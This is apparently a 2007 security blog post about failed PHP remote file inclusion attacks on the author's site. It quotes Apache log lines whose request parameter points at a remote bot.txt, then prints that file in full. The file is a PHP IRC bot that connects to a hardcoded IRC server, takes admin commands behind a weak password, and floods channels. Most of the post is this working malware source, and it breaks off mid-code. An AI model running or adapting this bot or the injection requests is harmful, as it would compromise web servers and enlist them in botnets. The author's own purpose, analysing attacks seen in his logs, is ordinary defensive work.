Nov
Crazy php code injections
Posted by jerry as Hacking, Security
As I’ve written about here several times, the onslaught of unsuccessful php include attacks continues. Today, I saw a new file referenced – bot.txt. It looked like this in the apache log file:
216.246.48.124 – - [23/Nov/2007:17:17:13 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
216.246.48.124 – - [23/Nov/2007:17:17:13 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
216.246.48.124 – - [23/Nov/2007:17:17:14 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:40 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:40 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
205.234.253.31 – - [23/Nov/2007:17:18:41 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41845 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41894 “-” “libwww-perl/5.808″
72.29.84.167 – - [23/Nov/2007:17:18:57 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.dreamhoppers.com/guestbook/lib/bot.txt?? HTTP/1.1″ 404 41857 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:18 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:18 -0500] “GET /2007/11/20/current-crop-of-php-include-attempts//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41881 “-” “libwww-perl/5.808″
69.65.20.238 – - [23/Nov/2007:17:19:19 -0500] “GET /2007/11/20//chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41844 “-” “libwww-perl/5.808″
205.134.252.23 – - [23/Nov/2007:17:21:05 -0500] “GET //chat/inc/cmses/aedating4CMS.php?dir[inc]=http://www.geocities.com/n_jeg/bot.txt?? HTTP/1.1″ 404 41832 “-” “libwww-perl/5.808″
I have been downloading and looking at each of the files I see – most of them are the same or loosely copied from one another. Today is the first time seeing this file for me. The file follows:
</html>
<title>31337</title>
<?php
//fighter script – BAJAY
function working() {
$querym=array(
“?”,
“!”,
“^^”,
” ^^”,
” 
“,
” 
”,
” ~:>”,
” 
~”,
” 
”,
“,”,
“.”,
“a”,
“i”,
“u”,
“e”,
“o”,
“z”,
“v”,
“z”,
“x”,
“c”,
“p”,
“m”,
“t”,
“k”,
“b”,
“s”,
“u”,
“bot”,
“g”,
“lo”,
“jo”,
“lol”
);
$tsu1=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”“);
$tsu2=array(“`”,”|”,”[","]“,”{“,”}”,”^”,”-”,”\\”,”“);
$nicky=array(
”indotong”,
”rujange”,
”kentungs`”,
”sa_bosox”,
”japut1h”,
”start-Tegal”,
”stafp-pol”,
”apring”,
”my-bojo”,
”didiamu”,
”acongkasep”,
”rahasiailahi”,
”kutukurap”,
”duniagame”,
”pipilak”,
”Deeams”,
”Dewiani”,
”Lohanes”,
”Semsem2″,
”kuruyuk”,
”J4mput9″,
”acongTop”,
”bojokuayu”,
”Yuliyanti”,
”Ratnazar1″,
”Mydidit”,
”Rebecha”,
”Rastang”,
”Ganjils”,
”Bob-ho”,
”Dhinihari”,
”Dewimalam”,
”Lunaks”,
”Lowo-lawet”,
”Kolor-ku”,
”repolisi”,
”macanireng”,
”ivantat”,
”Kasugihan”,
”Kasiandeh”,
”awakapal”,
”Rachings”,
”War-tol”,
”Warnetlu”,
”Antikus”,
”[Dwirais]“,
”Phoecrot”,
”hiumania”,
”mas-amain”,
”Fafa-item”,
”Neonoek”,
”mba-abel”,
”Bencana”,
”nyosor”,
”Fitaken”,
”novakerep”,
”poerin”,
”lembene”,
”[sutijah]“,
”Skickmat”,
”Depangank”,
”Bonutang”,
”Stelangas”,
”Hellomam”,
”Pinkwingke”,
”Rolsepatu”,
”Defanku”,
”Mamalia”,
”Grahams”,
”Rocok”,
”jintuL-”,
”Urunan”,
”Piceks”,
”Kirbaju”,
”Asinans”,
”Muluk”,
”Mainanku”,
”Memete”,
”Kerambol”,
”Morbaut”,
”Clanane”,
”Nicitirta”,
”Jahlogo”,
”Sogokeh”,
”Hayamwuruk”,
”Selipan”,
”Myculun”,
”Mybojoe”,
”Selething”,
”T|kets”,
”Kompromi”,
”Montoks”,
”Trinitad”,
”Turboxs”,
”Mymata”,
”Indomobil”,
”KotaTegalkoe”,
”Peramal”,
”Hilangkoe”,
”Jalangs”,
”Jeengkel”,
”KaKikuda”,
”zhempol”,
”Pupens”,
”reneo”,
”[dorce]“,
”[yakin]“,
”[sung]“,
”[asli]“,
”suratan”,
”Cemplunk”,
”ladood”,
”lodados”,
”Jaambret”,
”Nyanyie”,
”Karmate”,
”Kunclup”,
”Simiskin”,
”Kamprets”,
”Kandang”,
”Kamuse”,
”Kendils”,
”Ketans”,
”Maantri”,
”anjengk”,
”angklung”,
”Kopok”,
”Krasi”,
”Kotors”,
”Karpets”,
”Kejangs”,
”Antraxs”,
”Adaband”,
”Kakusung”,
”Cocoran”,
”Bebelak”,
”Buluss”,
”Banatung”,
”Bembem”,
”Buntung”,
”Boroks”,
”Bambangs”,
”Bonteng”,
”Bumbu”,
”Bagasi”,
”Bimbing”,
”Chawets”,
”Coontex”,
”Clikat”,
”Cemceman”,
”Cokore”,
”Cuning”,
”Karmans”,
”Kodils”,
”Kaamra”,
”Darjo”,
”Dawud”,
”Daarto”,
”Damrie”,
”Dakroni”,
”Dimyati”,
”Dulung”,
”Enteng”,
”Emaxs”,
”Lomoboh”,
”Comodore”,
”Cimenks”,
”Cerutu”,
”Contonge”,
”Cukek”,
”Comblang”,
”Cemplak”,
”Cemanie”,
”Cembok”,
”Cekram”,
”Tegasung”,
”Tegarlah”,
”Teguhlah”,
”Tegeltak”,
”Tempek”,
”Antraxs”,
”Ampow”,
”Azdan”,
”Aburadul”,
”Antro”,
”Amings”,
”Angrexs”,
”Asrama”,
”Alimsung”,
”Aalas”,
”Abangku”,
”Amise”,
”Aconks”,
”Acongcup”,
”Acongsu”,
”Aconger”,
”Acongus”,
”Acongen”,
”sshd”,
”Masterkid”,
”alexutz”,
”andreea”,
”diana”,
”marius”,
”r00t”,
”kit”,
”mihai”,
”mihaela”,
”mario”,
”daiana”,
”andrei”,
”andreia”,
”tigan”,
”petre”,
”peter”,
”alexandre”,
”raluca”,
”master”,
”kid”,
”alias”,
”sbin”,
”p0rt”,
”sync”,
”mildest”,
”xzvf”,
”tar”,
”tgz”,
”dfg”,
”netcatxpl”,
”xpl”,
”xop”,
”xpls”,
”xploit”,
”xploits”,
”drxrwx”,
”drx-x”,
”system32″,
”alexandru”,
”alexander”,
”mihaela”,
”andrusca”,
”andra”,
”darius”,
”dani”,
”darnie”,
”daniel”,
”daniela”,
”mist3r”,
”x9v93c”,
”hunglec”,
”blasje”,
”bash”,
”blicke”,
”foirne”,
”wonder”,
”cvv2″,
”ssn”,
”creditcard”,
”ccnumber”,
”usher”,
”salam”,
”guta”,
”gutza”,
”biatchx”,
”bitch”,
”bitchX”,
”cine3″,
”scufitza”,
”copiluldeaur”,
”b0r4k”,
”counter”,
”strike”,
”usuf”,
”erny”,
”ernest”,
”modjo”,
”jinger”,
”b0ts”,
”r00ter”,
”g00gler”,
”mistcke”,
”linuxhack”,
”linuxhacker”,
”hacked”,
”fain”,
”ssl”,
”czxvr”,
”alb”,
”rosu”,
”romania”,
”rusia”,
”uk”,
”anglia”,
”comment”,
”hi5″,
”yah00″,
”silence”,
”us-com”,
”htiermc”,
”c00ldown”,
”misteryo”,
”hasked”,
”billaio”,
”smeoua”,
”muie”,
”sugator”,
”hashed”,
”f0lds”,
”folk”,
”f0lks”,
”numeroben”,
”hulk”,
”hiscke”,
”unae”,
”unhackable”,
”unhacker”,
”h4ack3rz”,
”hackerz”,
”ruter”,
”inji”,
”injecto”,
”freespace”,
”bulling”,
”mihaio”,
”ulgia”,
”c992mc”,
”miskce”,
”uber”,
”n0r”,
”c0x”,
”niekad”,
”naked”,
”nakedboy”,
”b0ys”,
”b0y”,
”messenger”,
”hopa”,
”hai-hui”,
”power-me”,
”sekos”,
”micke”,
”n0tron”,
”ron”,
”d0llars”,
”Euros”,
”pavalgia”,
”nasty”,
”hideend”,
”miskr3c”,
”incjen”,
”mass”,
”mailers”,
”mail3r”,
”th3kid”,
”k1d”,
”hepa”,
”m00r-d3f”,
”tzaca-paca”,
”headshot”,
”higgings”,
”slapest”,
”gansta”,
”gigging”,
”oame”,
”aoana”,
”mcike_dke”,
”blible”,
”XeqtR”,
”Xander”,
”xXx”,
”xxL”,
”vartmp”,
”0aoek”,
”summer”,
”etez”,
”crucike”,
”n0rme”,
”mihale”,
”c0rneaz”,
”blestem”,
”ghoost”,
”sicles”,
”c0mrsze”,
”sckme”,
”abie9t”,
”g912mc”,
”opernms”,
”micake”,
”qsuen”,
”zquers”,
”targetzd”,
”kem30ce”,
”nik1rc”,
”miosugi”,
”sugipula”,
”alupigus”,
”criminal”,
”danke”,
”shonw”,
”c0mrme”,
”muhahah”,
”biker4zs”,
”ckkemc”,
”clujeane”,
”hepahofn”,
”hepafon”,
”blackspace”,
”aabbcc”,
”ni1krc”,
”perosume”,
”perugis”,
”cliskeacz”,
”hennmx0c”,
”gbusf41″,
”bv9mvu3″,
”nik3rcs”,
”ghruwec”,
”slickez”,
”burgez”,
”h4mburger”,
”dijenmcie”,
”pijakence”,
”hai-blaeh”,
”power-you”,
”djstone”,
”djkid”,
”djthekid”,
”djmaster”,
”eftimie”,
”djcorason”,
”djalex”,
”djconstantin”,
”djbitch”,
”djk1d”,
”djtarget”,
”masterjungel”,
”daradaam”,
”uhmenze”,
”glicjex”,
”fortex”,
”hepafoneav”,
”m00rd3r”,
”tzacapaca”,
”nijeaz”,
”clijekcmez”,
”okkmmenc”,
”psyBNCz”,
”shellZ0″,
”kinderuL”,
”XeqtR”,
”metrolink”,
”ana”,
”anna”,
”squre”,
”xzvf0″,
”k1d-”,
”norman”,
”zquRs”,
”howhigh”,
”howhigt2″,
”blessus”,
”am3rica”,
”amer1ca”,
”spion”,
”spypower”,
”nextfan”,
”upl0ad”,
”s3arch”,
”searchX”,
”b0rak”,
”w00ps”,
”s0x”,
”nefertiti”,
”woops”,
”higlas”,
”cronx”,
”sown”,
”zappura”,
”heavenX”,
”muhahah1″,
”biker4zs1″,
”ckkemc1″,
”clujeane1″,
”hepahofn1″,
”hepafon1″,
”blackspace1″,
”aabbcc1″,
”ni1krc1″,
”perosume1″,
”perugis1″,
”cliskeacz1″,
”hennmx0c1″,
”gbusf411″,
”bv9mvu31″,
”nik3rcs1″,
”ghruwec1″,
”slickez1″,
”burgez1″,
”h4mburger1″,
”dijenmcie1″,
”pijakence1″,
”hai-blaeh1″,
”power-you1″,
”djstone1″,
”djkid1″,
”djthekid1″,
”djmaster1″,
”eftimie1″,
”djcorason1″,
”djalex1″,
”djconstantin1″,
”djbitch1″,
”djk1d1″,
”djtarget1″,
”masterjungel1″,
”daradaam1″,
”uhmenze1″,
”glicjex1″,
”fortex1″,
”hepafoneav1″,
”m00rd3r1″,
”tzacapaca1″,
”nijeaz1″,
”clijekcmez1″,
”okkmmenc1″,
”psyBNCz1″,
”shellZX”,
);
$usr1=array(
“zider”,
);
$nick = $nicky[rand(0,count($nicky) - 1)];
$awaymsg = “_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚« 4H4Kim _8CÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚®ÃfĮâ€TMÃf†â€™Ãfƒâ€šÃf‚«wS _4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚»_8!_4ÃfĮâ€TMÃf¢â‚¬Å¡Ãfƒâ€šÃf‚«__”;
$identify = ”;
$Admin = ‘zaNga’;
$BOT_PASSWORD = ’123′;
$channels = ‘netcat’;$remotehst2= array(“irc.yogyakarta.cn”);
$remotehost= $remotehst2[rand(0,count($remotehst2) - 1)];
$port = ’6667′;$raway = “on”;
$realname = $nick;
$counterfp = 0;
$channels = str_replace(“CNL”,”",$channels);
print “<body bgcolor=#000000 text=#C0C0C0>”;
print “<b>== Connecting to $remotehost…</b>”;
$log = “off”;
$saway = “1″;
if (!$stime) { $stime = time(); }
if (!$port) { $port = “6666″; }
$Admin = strtolower($Admin);
$auth = array($Admin => array(“name” => $Admin, “pass” => $BOT_PASSWORD, “auth” => 1,”status” => “Admin”));
$username = $usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)].$usr1[rand(0,count($usr1) - 1)];
$keluar = 0;
$akill = 1;
$katime = 0;
$localhost = ‘localhost’;
$dayload = date(“H:i:s d/m/Y”);
ini_set(‘user_agent’,'MSIE 5\.5;’);
set_time_limit(0);
define (‘CRL’, “\r\n”);
$channels = strtolower($channels).” “;
$channel = explode(” “, $channels);
do {
$fp = fsockopen($remotehost,$port, &$err_num, &$err_msg, 30);
if(!$fp) {
if ( $counterfp <= 200 ) {
$counterfp = $counterfp+1;
working($nick);
}
else {
print "<br><b>Cannot connect to $remotehost!<br>Please Try Another Server!</b>";
$keluar = 1;
exit;
}
}
print “<br><b>== Suceeded connection</b>”;
$Header = ‘NICK ‘.$nick . CRL;
$Header .= ‘USER ‘.$username.’ ‘.$localhost.’ ‘.$remotehost.’ :’.$realname . CRL;
fputs($fp, $Header);
$response = ”;
while (!feof($fp)) {
$response .= fgets($fp, 1024);
while (substr_count($response,CRL) != 0) {
$offset = strpos($response, CRL);
$data = substr($response,0,$offset);
$response = substr($response,$offset+2);
if (substr($data,0,1) == ':') {
$offsetA = strpos($data, ' ');
$dFrom = substr($data,1,$offsetA-1);
$offsetB = strpos($data, ' :');
$dCommand = substr($data,$offsetA+1,$offsetB-$offsetA-1);
$offsetC = strpos($data, '!');
$dNick = substr($data,1,$offsetC-1);
$iText = substr($data,$offsetB+2);
if ( substr($dCommand,0,3) == '004' ) {
fputs($fp, 'PRIVMSG nickserv@services.dal.net :identify '.$nick.' '.$identify. CRL);
if ($nickmode) { fputs($fp, 'MODE '.$nick.' :'.$nickmode . CRL); }
fputs($fp, 'NOTICE ' . $Admin . ' :Halo bos besar!' . CRL);
foreach ($channel as $v) {
fputs($fp, 'JOIN ' .$v . CRL);
}
$pong1 = '1';
}
elseif (substr($dCommand,0,3)=='465') {
print "<br><b>== This bot have been autokilled.</b>";
$akill = 2;
}
elseif (substr($dCommand,0,3)=='433') {
$nick = $nicky[rand(0,count($nicky) - 1)];
fputs($fp, 'NICK '.$nick . CRL);
}
elseif (substr($dCommand,0,3)=='432') {
$nick = $nick.$username;
fputs($fp, 'NICK '.$nick . CRL);
}
if (eregi('.dal.net',$dNick) && $akill==2) {
if (eregi('AKILL ID:',$data) || eregi('Your hostmask is',$data) || eregi('Your IP is',$data)) {
print "<br><b>".strstr($data,'***')." </b>";
if (eregi('Your IP is',$data)) {
$keluar = 1;
exit;
}
}
}
$dcom = explode(" ", $dCommand);
$dNick = strtolower($dNick);
if ($dcom[0]=='KICK' && $dcom[2]==$nick) {
fputs($fp, 'JOIN ' .$dcom[1]. CRL);
}
elseif ($dcom[0]=='NICK' || $dcom[0]=='QUIT' || $dcom[0]=='PART') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($dcom[0]=='NICK') {
$com = explode(" ", $data);
$chnick = strtolower(str_replace(':','',$com[2]));
if ($dNick!=$chnick) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE '.$chnick.' :selamat istirahat bos! ' . CRL);
}
} else { $auth["$dNick"]["auth"] = 1; fputs($fp,'NOTICE '.$dNick.' :selamat istirahat bos! ' . CRL); }
}
} else { fputs($fp,'NOTICE ' . $dNick . ' :pass your pass ' . CRL); }
}
}
elseif ($dcom[0]=='307' && strtolower($dcom[2])==$whois) {
$dcom[2] = strtolower($dcom[2]);
if ($auth["$dcom[2]"]) {
if ($auth["$dcom[2]"]["pass"]) {
if ($auth["$dcom[2]"]["auth"]==1) {
$auth["$dcom[2]"]["auth"] = 2; $whois = "";
fputs($fp,'NOTICE ' . $dcom[2] . ' :kamu masukan password as '.$auth["$dcom[2]"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :password oke bos aChOnGs seep emuach di titid! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dcom[2] . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($dcom[0]=='NOTICE') {
$com = explode(" ", $data);
if ($com[3]==':KB' && $com[4] && $com[5] && $com[6]) {
$msg = strreplace('','',$data);
$msg = strstr($msg,":KB");
$msg = strreplace(":KB $com[4]","",$msg);
fputs($fp, 'KICK '.$com[4].' '.$com[5].' :'.$msg . CRL);
fputs($fp, 'MODE '.$com[4].' +b *!*'.$com[6] . CRL);
}
}
elseif ($dcom[0]=='PRIVMSG') {
$com = explode(" ", $data);
if ($com[3]==':VERSION') {
fputs($fp,'NOTICE '.$dNick.' :'.chr(1).'VERSION mIRC v6.16 Khaled Mardam-Bey'.chr(1) . CRL);
}
elseif ($auth["$dNick"]["status"] && $com[3]==':auth' && $com[4]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==1) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["auth"] = 2;
fputs($fp,'NOTICE ' . $dNick . ' :kamu masukkan password as '.$auth["$dNick"]["status"].' of this bot! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :passworde salah syu! Auth salah Shu! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :password bener bos aChOnGs emang oke! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deauth') {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["pass"]) {
if ($auth["$dNick"]["auth"]==2) {
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :You`re LogOut! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :You`re Already LogOut! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' ass Not Set Yet! Type: pass <your pass> To Set Your Own Password then Auth Again ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Auth Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':pass' && $com[4]) {
if ($auth["$dNick"]) {
if (!$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[4];
$auth["$dNick"]["auth"] = 1;
fputs($fp,'NOTICE ' . $dNick . ' :Your Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' ass Already Set! Type: auth <your pass> To Get Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':chgpass' && $com[4] && $com[5]) {
if ($auth["$dNick"]) {
if ($auth["$dNick"]["auth"]==2) {
if ($com[4]===$auth["$dNick"]["pass"]) {
$auth["$dNick"]["pass"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :Your New Auth Pass set to '.$auth["$dNick"]["pass"].', Type: auth <your pass> To Authorized Imediately! ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Your Old Pass Wrong! Type: chgpass <old pass> <new pass> To Change Your Auth Pass ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Username Not Found! Change Your Nick then Pass Again ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':adduser' && $com[4] && $com[4]!=$nick && $com[5]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($com[5]=="master" || $com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass> To Set Your Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :salah Command! Type: adduser <nick> <master/user> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if (!$auth["$com[4]"]) {
if ($com[5]=="user") {
$auth["$com[4]"]["name"] = $com[4];
$auth["$com[4]"]["status"] = $com[5];
fputs($fp,'NOTICE ' . $dNick . ' :AddUser :'.$com[4].' As My '.$com[5] . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :You`re Now Known As My '.$com[5].' Added By '.$dNick.' Now Type: pass <your pass33] <Spyderur Pass ' . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: adduser <nick> user ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :User Already Exist! Aborting AddUser! ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"] && $com[3]==':deluser' && $com[4]) {
$com[4] = strtolower($com[4]);
if ($auth["$dNick"]["auth"]==2) {
if ($auth["$dNick"]["status"]=="Admin") {
if ($auth["$com[4]"]["status"]=="master" || $auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' elUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} elseif ($auth["$dNick"]["status"]=="master") {
if ($auth["$com[4]"]["status"]=="user") {
unset($auth["$com[4]"]);
fputs($fp,'NOTICE ' . $dNick . ' elUser :'.$com[4].' From My UserList ' . CRL);
fputs($fp,'NOTICE ' . $com[4] . ' :Your Access As My User Has Been Deleted By '.$dNick . CRL);
} else { fputs($fp,'NOTICE ' . $dNick . ' :Wrong Command! Type: deluser <nick> ' . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' :Unknown Status! Your Status is '.$auth["$dNick"]["status"] . CRL); }
} else { fputs($fp,'NOTICE ' . $dNick . ' lease Auth First! Type: auth <your pass> To Authorized ' . CRL); }
}
elseif ($auth["$dNick"]["status"]) {
if (ereg(":`",$com[3]) || ereg(":!",$com[3])) {
$chan = strstr($dCommand,"#");
$anick = str_replace("PRIVMSG ","",$dCommand);
if ($com[3]==':!auth') {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'NOTICE '.$dNick.' :Jembutz..! You`re already Authorized!' . CRL);
} else {
$whois = $dNick;
fputs($fp,'WHOIS '.$dNick . CRL);
}
} elseif ($com[3]==':`auth' && $chan) {
if ($auth["$dNick"]["auth"]==2) {
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Hamba siap mencari janda Bos!' . CRL);
} else { fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.' Raimu bukan bosku cok!' . CRL); }
} elseif ($auth["$dNick"]["auth"]==2) {
if ($com[3]==':`say' && $com[4] && $chan) {
$msg = strstr($data,":`say");
$msg = str_replace(":`say ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :'.$msg. CRL);
}
elseif ($com[3]==':`act' && $com[4] && $chan) {
$msg = strstr($data,":`act");
$msg = str_replace(":`act ","",$msg);
fputs($fp,'PRIVMSG '.$chan.' :ACTION '.$msg.''. CRL);
}
elseif ($com[3]==':`slap' && $com[4] && $chan) {
fputs($fp,'PRIVMSG '.$chan.' :ACTION slaps '.$com[4].' Jembut Raimu wani karo bosku around a bit with a large trout'. CRL);
}
elseif ($com[3]==':`msg' && $com[4] && $com[5]) {
$msg = strstr($data,":`msg");
$msg = str_replace(":`msg $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`notice' && $com[4] && $com[5]) {
$msg = strstr($data,":`notice");
$msg = str_replace(":`notice $com[4] ","",$msg);
fputs($fp,'NOTICE '.$com[4].' :'.$msg. CRL);
}
elseif ($com[3]==':`ctcp' && $com[4] && $com[5]) {
$msg = strstr($data,":`ctcp");
$msg = str_replace(":`ctcp $com[4] ","",$msg);
fputs($fp,'PRIVMSG '.$com[4].' :'.$msg.''. CRL);
}
elseif ($com[3]==':`ping' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PONG!_ '.$sml. CRL);
}
elseif ($com[3]==':`pong' && $chan) {
$sml = $smile[rand(0,count($smile) - 1)];
fputs($fp,'PRIVMSG '.$chan.' :'.$dNick.', _PING!_ '.$sml. CRL);
}
elseif ($com[3]==':`info' && $auth["$dNick"]["status"]=="Admin") {
$bhost = $SERVER['HTTPHOST'];
$bphp = $SERVER['PHPSELF'];
fputs($fp,'NOTICE '.$dNick.' :Bot Host: '.$bhost.', Bot PHP: '.$bphp. CRL);
}
elseif ($com[3]==':`up' && $chan) {
fputs($fp, 'PRIVMSG chanserv@services.dal.net 
p '.$chan.' '.$nick . CRL);
}
elseif ($com[3]==':`down' && $chan) {
fputs($fp, 'MODE '.$chan.' +v-o '.$nick.' '.$nick . CRL);
}
elseif ($com[3]==':`tsunami' && $com[4] && $auth["$dNick"]["status"]!="user") {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
if (substr($dCommand,0,3)=='433') {
$nicktsu = $tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)].$tsu1[rand(0,count($tsu1) - 1)].$tsu2[rand(0,count($tsu2) - 1)];
fputs($fp, 'NICK '.$nicktsu . CRL);
}
$msg = strstr($data,":`tsunami");
$msg = str_replace(":`tsunami $com[4]","",$msg);
if (ereg("#", $com[4])) {
fputs($fp, 'JOIN '.$com[4] . CRL);
}
fputs($fp, 'PRIVMSG '.$com[4].' :'.$msg.'__________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
fputs($fp, 'NOTICE '.$com[4].' :'.$msg.'___________________________________________________________________________________________________________________________________________________________________________________________________________________________________' . CRL);
